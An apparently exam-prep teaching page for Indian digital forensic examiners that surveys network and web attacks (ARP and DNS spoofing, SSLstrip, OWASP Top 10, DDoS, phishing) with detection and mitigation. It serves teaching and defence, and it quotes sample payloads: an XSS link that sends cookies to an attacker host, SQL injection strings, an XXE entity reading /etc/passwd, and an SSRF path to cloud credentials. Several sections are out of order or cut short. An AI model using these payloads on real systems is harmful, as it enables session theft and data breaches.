Practice with national-level exam (FACT, FACT Plus, NET, CUET, etc.) mocks, learn from structured notes, and get your doubts solved in one place.
The network attack taxonomy for Indian digital forensic examiners: passive vs active sniffing, ARP and DNS spoofing, BGP hijacks, MITM and SSLstrip, OWASP Top 10 web attacks (XSS, SQLi, CSRF, SSRF, XXE), volumetric and application-layer DDoS, phishing and zero-days, with CERT-In incident response, banking DDoS during festival sales, and the I4C escalation path.
A network forensic investigator in India spends most of their working week reading captures and logs from attacks that are not new. ARP poisoning was first described in 1982. SQL injection was named by Jeff Forristal in 1998. The Kaminsky DNS cache poisoning bug landed in 2008. Yet every quarter the I4C portal at cybercrime.gov.in records fresh complaints whose root cause is one of these decades-old techniques applied to a fresh target. The reason is that the attack catalogue is finite and well documented; the defence side, especially at small Indian e-commerce and fintech operators, keeps relearning the basics under live fire.
This topic is the digital forensics network attack taxonomy. It walks each attack family from passive sniffing through web injection to volumetric DDoS, with the tools, the protocol weaknesses, the detection signal in a packet capture, and the mitigation an examiner would expect to see at a competently defended Indian bank or government site. The Indian operational layer is CERT-In incident response under the IT Act 2000 Section 70B, the National Critical Information Infrastructure Protection Centre (NCIIPC), and the I4C citizen helpline 1930. Cross-links go to the wireless attack topic, the malware forensics topic and the cyber crime taxonomy and IT Act 2000.
The cheapest attack: just listen.
Packet sniffing is the foundation under most other network attacks. A sniffer reads frames off the medium and feeds them to a dissector. On a wired switched network the sniffer's reach is limited to its own port, broadcast traffic, and whatever a managed switch's SPAN or RSPAN session is configured to mirror. On a Wi-Fi network in monitor mode a sniffer reads every frame on the chosen channel within radio range, encrypted or not.
The standard tool stack is small. Wireshark is the desktop dissector, with dissectors for over 3000 protocols and a TLS keylog import facility for decrypting captures when SSLKEYLOGFILE was set. tcpdump is the BSD-licensed command-line capture tool, the workhorse on Linux servers. tshark is Wireshark's command-line sibling, used for scripted capture and BPF filtering. Ettercap is the active-MITM workhorse with built-in ARP poisoning, DNS spoofing, and SSLstrip plug-ins. Bettercap is the modern Go-based replacement for Ettercap, scripted in Caplets. Cain & Abel was the historical Windows toolkit, now retired but still referenced in NFSU question banks. Aircrack-ng is the Wi-Fi capture and crack suite.
Passive sniffing leaves no observable trace on the wire. The sniffer's network card is in promiscuous mode (wired) or monitor mode (Wi-Fi), it does not transmit, and the only way to catch a passive sniffer is physical inspection or, on some old systems, a latency-based test that exploits ARP and ICMP response times when the kernel is busy with extra frames. Active sniffing transmits forged frames to coax traffic into reaching the sniffer's port: ARP poisoning is the canonical example, but port stealing (the attacker keeps re-claiming a switch port for its own MAC) and STP root-bridge attacks (the attacker advertises itself as root and reshapes the spanning tree) also count.
Lying about who you are, at every layer.
Spoofing is the family of attacks in which the adversary forges a source identifier. Each layer of the stack has its own spoof.
| Spoof | Layer | What is forged | Detection signal |
|---|---|---|---|
| IP spoofing | Network (3) | Source IPv4/IPv6 | Egress traffic from outside the BCP38 allowed prefixes |
| MAC spoofing | Data Link (2) | Source MAC | Vendor OUI mismatch with device class; sudden MAC change on a port |
| ARP spoofing | Data Link (2) | ARP reply binding wrong MAC to IP | Duplicate IP claims; gratuitous ARP storm; arpwatch alert |
| DNS spoofing | Application (7) | Response to DNS query (cache poison or local hijack) | Resolver answer differs from authoritative; DNSSEC validation fail |
| Email spoofing | Application (7) | From header, Return-Path, envelope sender |
A single forged reply, every LAN host fooled.
ARP, the Address Resolution Protocol (RFC 826), maps a Layer 3 IPv4 address to a Layer 2 MAC on the local segment. A host that wants to talk to 192.168.1.1 broadcasts an ARP request who has 192.168.1.1, tell 192.168.1.50; the router replies with its MAC; the requester caches the binding. ARP has no authentication. Any host on the segment can send an unsolicited (gratuitous) ARP reply claiming to own any IP, and most operating systems happily update their caches.
ARP poisoning exploits that. The attacker sends two streams of gratuitous ARP replies on the LAN: one to the gateway claiming victim_IP is at attacker_MAC, and one to the victim claiming gateway_IP is at attacker_MAC. After both caches update, every packet between the victim and the gateway transits the attacker, who forwards the traffic onward to maintain the illusion of normal connectivity and reads or modifies it in flight.
When the routing layer lies, every layer above it lies with it.
DNS spoofing has three operational forms. Local LAN DNS spoofing uses ARP poisoning to put the attacker on the path, then rewrites DNS responses in flight (Bettercap's dns.spoof module is a one-liner). Cache poisoning targets a recursive resolver: the attacker races the legitimate authoritative reply by guessing the resolver's source port and the 16-bit transaction ID and injecting a malicious reply first. Dan Kaminsky's 2008 work showed that the resolver could be tricked into accepting glue records for an entire zone in seconds when source-port randomisation was missing, and forced every major DNS implementation to deploy source-port randomisation within weeks. DNSSEC (RFC 4033 onward) signs DNS records with public-key cryptography; a validating resolver rejects unsigned or invalidly signed replies. DoH (DNS over HTTPS, RFC 8484) and DoT (DNS over TLS, RFC 7858) encrypt the query channel to the resolver, defeating local LAN DNS spoofing but not cache poisoning.
Routing table poisoning at the BGP layer changes the path that traffic takes between autonomous systems. Two cases shape the textbook:
RPKI (Resource Public Key Infrastructure, RFC 6480) signs BGP route origin claims and lets validating routers reject unsigned or invalid announcements. Indian carriers Tata Communications and Reliance Jio publish ROAs (Route Origin Authorizations) on most of their prefixes as of 2025.
SSLstrip (Moxie Marlinspike, 2009) is the canonical HTTPS downgrade attack. The attacker, already in a MITM position, intercepts the user's first plain HTTP request to a site, fetches the real HTTPS page on the user's behalf, rewrites every https:// link in the returned HTML to http://, and serves the modified plaintext page to the victim. The user's address bar shows rather than the padlock, but most users miss it. Mitigations are HSTS (HTTP Strict Transport Security, RFC 6797), where the server tells the browser to refuse plain-HTTP connections for a set time; HSTS preload lists, where popular domains are baked into every browser shipping; and HTTPS-only mode, on by default in Firefox and Edge as of 2024. The downgrade dance, broader than SSLstrip, includes TLS version downgrade attacks like POODLE (CVE-2014-3566) and Logjam (CVE-2015-4000) that exploited acceptance of older TLS versions or weak Diffie-Hellman groups.
OWASP Top 10 in the dock.
Most casework against Indian e-commerce, fintech and government portals lands at the web application layer. The current OWASP Top 10 (2021 edition, the active list while OWASP prepares the 2025 refresh) ranks ten risk categories. Each maps to one or more attack technique families.
| # | OWASP 2021 category | Example exploit | Primary mitigation |
|---|---|---|---|
| A01 | Broken Access Control | IDOR; horizontal/vertical privilege escalation | Server-side authorisation per request, deny by default |
| A02 | Cryptographic Failures | Plaintext passwords, weak hashing, exposed keys | bcrypt/argon2, TLS 1.3, secret managers |
| A03 | Injection | SQLi, command injection, LDAP injection | Parameterised queries, allow-list input validation |
| A04 | Insecure Design | No threat model, no rate limit on login | Threat modelling, secure-by-design patterns |
Three ways to make a service unreachable, all of them cheap.
Denial of service attacks split by what they exhaust.
Volumetric attacks saturate the target's upstream bandwidth. The attack volume is measured in bps (sometimes pps for packet rate). UDP flood, ICMP flood and amplified reflection attacks fall here. Reflection/amplification is the high-leverage technique: the attacker sends a small spoofed-source query to a misconfigured service (DNS open resolver, NTP monlist, memcached UDP, SSDP) and the service sends a much larger reply to the spoofed victim. The amplification factor is the ratio of reply to query: DNS ANY queries amplify roughly 28x to 54x; NTP monlist amplifies 500x to 580x; memcached amplifies up to 51,000x and was responsible for the 1.35 Tbps GitHub attack in February 2018 and the 1.7 Tbps NetScout attack in March 2018.
Protocol attacks exhaust state on stateful boxes (load balancers, firewalls, application servers). SYN flood sends TCP SYNs without completing the handshake; the target holds half-open connection state until the SYN backlog fills. Mitigation: SYN cookies (Linux tcp_syncookies), which encode the connection state in the SYN-ACK sequence number so no backlog is needed. Fragmentation attacks send overlapping or oversized IP fragments that confuse reassembly (Teardrop, Ping of Death; mostly dead since the 2000s but resurface on poorly maintained embedded stacks).
Application-layer attacks exhaust application resources at low bandwidth. Slowloris opens many HTTP connections and sends partial headers, never finishing the request; a single laptop on a 10 Mbps link can take down an unhardened Apache server. HTTP GET flood uses real-looking GET requests to fetch expensive resources (search pages, dynamic reports); a botnet of compromised home routers serves the requests, and the target cannot distinguish them from legitimate users without rate limiting or behavioural fingerprinting.
The botnet of record is Mirai (Anna-Senpai source code release, September 2016), which compromised IoT devices (DVRs, IP cameras, home routers with default Telnet credentials) and produced the September 2016 attacks against Krebs on Security (around 620 Gbps), OVH (around 1 Tbps), and the October 2016 Dyn attack (1.2 Tbps) that took Twitter, Reddit, GitHub and Spotify offline for hours.
An attacker on a corporate guest VLAN attempts ARP poisoning against a host in the production VLAN. What is the outcome?
| SPF / DKIM / DMARC failure in Received-SPF header |
IP spoofing is the original attack, made famous in 1995 when Kevin Mitnick used it to impersonate a trusted host against Tsutomu Shimomura. The mitigation is BCP38 (RFC 2827), source-address filtering at the network ingress: a provider drops outbound packets whose source IP does not belong to the customer's allocated prefix. Indian Tier-1 ISPs largely implement BCP38 on their downstream peering, which is why IP-spoofed reflection attacks at scale are mostly sourced from misconfigured providers abroad.
MAC spoofing is a one-line command (ip link set dev eth0 address aa:bb:cc:dd:ee:ff on Linux, macchanger, or Wi-Fi privacy MAC randomisation on every modern phone). It defeats simple MAC filtering on home routers and is routine for any attacker on a captive portal or hotel Wi-Fi.
ARP spoofing is the LAN-scoped attack covered in detail in the next section. DNS spoofing is covered in section 4. Email spoofing is what every romance scam and CEO fraud is built on: forging the From header to look like a trusted sender. SPF (Sender Policy Framework, RFC 7208) lists which IPs are authorised to send for a domain. DKIM (DomainKeys Identified Mail, RFC 6376) cryptographically signs the message. DMARC (RFC 7489) tells receivers what to do when SPF or DKIM fails. A receiving mail server that enforces strict DMARC on gov.in mail rejects most spoofing attempts at the perimeter.
The standard ARP poisoning tools are arpspoof (part of the dsniff suite), Ettercap (with the arp plug-in), Bettercap (arp.spoof module), and historically Cain & Abel on Windows. Detection runs at two levels. arpwatch (LBNL, Unix) logs new MAC-IP bindings on the local segment and emails alerts when a binding changes; sudden alerts during business hours are a high-signal ARP spoofing indicator. ArpON is a Linux kernel-level defender that statically pins gateway bindings. X-ARP is a Windows-side equivalent. Enterprise switches implement Dynamic ARP Inspection (DAI) on Cisco gear, which validates ARP replies against a DHCP snooping binding table and drops mismatches at the switchport.
The scope is the broadcast domain only. ARP poisoning works within a single VLAN; it does not cross a router. An attacker on a corporate guest VLAN cannot poison ARP for hosts on the production VLAN. The forensic detection in a capture is the appearance of duplicate IP claims with different MACs in close succession, plus a sudden re-route of the victim's traffic through an unexpected MAC. The same MITM position can be obtained from a rogue access point on Wi-Fi, covered in the wireless attack topic.
http://Web jacking combines DNS spoofing with phishing: the attacker either poisons a resolver or compromises a registrar account to repoint a domain to their own server, then serves a clone of the original site. The 2010 Baidu hijack via the Iranian Cyber Army is the canonical example; the 2018 MyEtherWallet incident above is the BGP variant.
| A05 |
| Security Misconfiguration |
| Default credentials, dir listing, debug endpoints |
| Hardened baseline, automated config scans |
| A06 | Vulnerable and Outdated Components | Log4Shell, Spring4Shell | SBOM, automated CVE scanning |
| A07 | Identification and Authentication Failures | Credential stuffing, weak MFA | MFA, rate limit, breached-password lists |
| A08 | Software and Data Integrity Failures | Untrusted CI plug-ins, insecure deserialisation | Signed artifacts, SLSA build provenance |
| A09 | Security Logging and Monitoring Failures | No alerts on brute-force or anomalous access | Centralised logging, SIEM, alerting |
| A10 | SSRF (Server-Side Request Forgery) | Hit AWS metadata service from a web fetch | Outbound deny-list, network segmentation |
Cross-Site Scripting (XSS) is OWASP A03 Injection's web sibling. Three sub-types:
https://example.in/search?q=<script>fetch('//attacker/'+document.cookie)</script>. Single-victim, link-driven.document.location or window.name and writes it into the DOM without sanitisation. Indistinguishable from reflected XSS in the network capture; only static or dynamic analysis of the JS reveals the sink.Mitigation is output encoding by context (HTML body, attribute, JS string, URL, CSS each need different escaping), input validation (allow-list per field), and a Content-Security-Policy header that whitelists the sources of executable script. CSP is the seat belt: it does not stop the crash but reduces the impact when sanitisation fails.
SQL Injection (SQLi) breaks out of the SQL string context and lets the attacker run arbitrary database queries. Three styles by exfiltration channel:
' UNION SELECT username, password FROM users -- appended to a numeric ID parameter, where the response renders the union row. Fast.' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1)='a' -- .IF(condition, SLEEP(5), 0)); the attacker reads the answer from the response time. Slow but works when no other channel is visible.sqlmap is the standard automated exploitation tool, supporting all three styles and dozens of database fingerprints. The mitigation is parameterised queries (prepared statements with bound parameters), which separate the SQL template from the user-supplied values so that no input can break out of the string context. ORM frameworks like Django ORM, SQLAlchemy and Hibernate parameterise by default; raw psycopg2.execute("SELECT ... WHERE id=" + user_input) does not.
CSRF (Cross-Site Request Forgery) makes a logged-in user's browser submit an authenticated request to a target site without their knowledge. The attacker hosts a hidden form on attacker.com that POSTs to bank.in/transfer; the victim's browser sends the bank session cookie automatically. Mitigations are anti-CSRF tokens (a random per-session value the server embeds in forms and validates on submit) and SameSite cookies (Lax or Strict, which restrict cookie sending on cross-origin POSTs). Modern browsers default to SameSite=Lax for cookies that don't set the attribute, which has killed most casual CSRF in the wild.
SSRF (Server-Side Request Forgery) makes the server fetch a URL the attacker chooses. The textbook target is the AWS Instance Metadata Service at 169.254.169.254/latest/meta-data/iam/security-credentials/, which returns temporary IAM credentials. The 2019 Capital One breach was an SSRF hit on AWS metadata that exfiltrated credentials and then 100 million customer records. AWS IMDSv2 requires a session-token PUT first, blocking the trivial SSRF path; IMDSv1 is still enabled by default on older AMIs and is widely exploitable.
XXE (XML External Entity) abuses XML parsers that resolve external entities. An XML document with <!ENTITY xxe SYSTEM "file:///etc/passwd"> and a reference &xxe; reads the server's password file when parsed by a vulnerable processor. The mitigation is disabling external entity resolution; modern libxml2, .NET's XmlReader and Java's SAXParser ship with it off by default since 2014-2015.
Indian banking infrastructure faces seasonal DDoS during festival sales windows; the September 2023 attacks on State Bank of India's NetBanking gateway during the Onam shopping period and the November 2024 attacks on Razorpay's payment processing during Diwali peak both made CERT-In's quarterly advisory. The Election Commission of India ICT systems and the Aadhaar UIDAI public-facing APIs are recurring volumetric and credential-stuffing targets, with CERT-In and NCIIPC coordinating mitigations through upstream scrubbing centres at Tata Communications and Sify.
DDoS mitigation runs at three layers. Edge scrubbing (Cloudflare, Akamai, Imperva, AWS Shield Advanced) absorbs the attack on a globally distributed network and forwards clean traffic to the origin. ISP null-routing (BGP flowspec or RTBH, Remote Triggered Black Hole) drops traffic to the attacked IP at the carrier edge, which keeps the rest of the network up at the cost of the attacked service. Application-layer rate limiting (NGINX limit_req, Cloudflare rules, application WAF) caps request rates per IP, per session token or per behavioural fingerprint.
Rogue access points are MITM machinery at the wireless edge; the evil twin is a rogue AP that copies the SSID of a legitimate one to harvest clients, and captive portal abuse serves a fake login portal to harvest credentials. The deep dive lives in wireless network attacks across WEP, WPA, WPA2, WPA3 and rogue AP.
Insider threats account for a steady fraction of incidents that CERT-In handles. The Ponemon 2024 Cost of Insider Threats report puts the average global per-incident cost at 16.2 million USD and the share of insider-caused breaches at 26%; Verizon's 2024 DBIR pegs internal actors at 17% of all breaches. Detection runs on UEBA (User and Entity Behaviour Analytics) inside a SIEM, plus DLP at the egress. The trigger for SFSL involvement is usually a HR-side complaint that leads to a workstation imaging order under the workflow described in the malware forensics topic.
Social engineering, phishing, zero-days and the insider threat
The human is still the cheapest exploit.
Technical attacks ride on top of human ones. Phishing at network scale comes in several shapes. Spear phishing targets a named individual using their context (their boss's writing style, their HR portal's branding). Whaling targets executives. Smishing is phishing over SMS, and on Indian carriers it remains the dominant vector for OTP harvesting and UPI fraud routed through the I4C 1930 helpline. Phishing kit hosting is the network-layer artefact: a kit deployed on a compromised hosting account at a small Indian provider, fronted by a freshly registered look-alike domain on
.inor.co.in. The kit collects credentials and POSTs them to a Telegram bot for live operator follow-up. CERT-In's quarterly Phishing Activity Trends advisories list the most-impersonated brands; in 2024-2025 those were SBI, HDFC Bank, Axis Bank, India Post, IRCTC and the Income Tax e-filing portal.Social engineering without phishing covers pretexting (the attacker calls posing as a vendor or auditor with a story that justifies an information request), baiting (the attacker leaves a USB stick labelled "Payroll 2026" in a parking lot), tailgating (physically following an employee through a secure door), and quid pro quo (the attacker offers help in exchange for a credential). Indian call-centre cybercrime rings, especially the Jamtara cluster operating across Jharkhand and West Bengal, run pretexting and quid pro quo at industrial scale; NCRB's Crime in India annual report consistently ranks Jharkhand among the highest per-capita cyber-fraud districts.
Zero-day exploits are bugs unknown to the vendor, sold or used before a patch exists. Bug bounty platforms (HackerOne, Bugcrowd, YesWeHack, India's own NCIIPC Responsible Vulnerability Disclosure Programme) pay researchers for coordinated disclosure. CVE assignment is the MITRE-coordinated identifier; NVD at NIST publishes the CVSS scores. CISA KEV (Known Exploited Vulnerabilities) is the catalogue of CVEs proven to be actively exploited; as of May 2026 it lists over 1100 entries. The Indian equivalent advisory channel is CERT-In's vulnerability notes (CIVN series). Examples of high-impact recent CVEs: CVE-2021-44228 (Log4Shell, JNDI lookup in Log4j), CVE-2022-0847 (Dirty Pipe, Linux kernel pipe write), CVE-2024-3094 (XZ Utils backdoor in liblzma).